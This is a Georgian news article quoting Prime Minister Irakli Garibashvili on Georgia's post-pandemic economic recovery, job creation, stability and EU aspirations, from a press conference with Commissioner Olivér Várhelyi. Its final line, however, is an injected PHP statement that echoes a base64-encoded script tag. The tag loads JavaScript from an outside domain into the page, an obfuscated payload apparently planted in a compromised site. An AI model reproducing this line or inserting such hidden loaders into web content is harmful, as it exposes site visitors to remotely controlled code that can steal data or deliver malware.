celsiusi
ავერსი საქკაბელი

საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილის განცხადებით, პანდემიის შედეგად არსებული გამოწვევების მიუხედავად, საქართველოს აქვს პროგრესი ყველა მიმართულებით.

„ჩვენი ქვეყნის ეკონომიკა ძალიან სწრაფად იქნა აღდგენილი პანდემიის შემდეგ. ჩვენ შარშან ძალიან სწორი, გონივრული და ეფექტიანი ნაბიჯები გადავდგით. შარშან გვქონდა ორნიშნა ეკონომიკური ზრდა, წელსაც, მიუხედავად ამ გამოწვევებისა და რთული მდგომარეობისა, ჩვენ გვაქვს ორნიშნა ეკონომიკური ზრდა. 100 ათასზე მეტი სამუშაო ადგილი შეიქმნა სულ რაღაც ცხრა თვეში. თავად ნახავთ, რომ გვაქვს პროგრესი ყველა მიმართულებით, იქნება ეს ტურიზმი, ეკონომიკა, ექსპორტი, მთელი ინდუსტრია და ბიზნესსექტორი არის გააქტიურებული“, – აღნიშნა ირაკლი ღარიბაშვილმა.

ღარიბაშვილის განმარტებით, ამ თვალსაზრისით, დიდი მნიშვნელობა აქვს ქვეყნის მშვიდობისა და სტაბილურობის შენარჩუნებას.

„ერთადერთი გამონაკლისია მას შემდეგ, რაც აღვადგინეთ დამოუკიდებლობა, როცა საქართველოს აქვს უწყვეტი მშვიდობა და სტაბილურობა. ეს მოვახერხეთ ჩვენი გონივრული პოლიტიკით, ამავდროულად, ჩვენი პრინციპულობით მას შემდეგ, რაც ჩვენ მოვედით ხელისუფლებაში. ჩვენი ხალხის და ქვეყნის ეროვნულ ინტერესებშია, რომ გვქონდეს მშვიდობიანი, სტაბილური და განვითარების მომტანი პერიოდი. ჩვენი მომავალი არის ევროკავშირში, ჩვენ ამის გვჯერა და ამას ერთად მივაღწევთ“, – განაცხადა ირაკლი ღარიბაშვილმა ევროპული სამეზობლო პოლიტიკისა და გაფართოების საკითხებში ევროკომისარ ოლივერ ვარჰეისთან ერთად გამართულ პრესკონფერენციაზე.

348
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");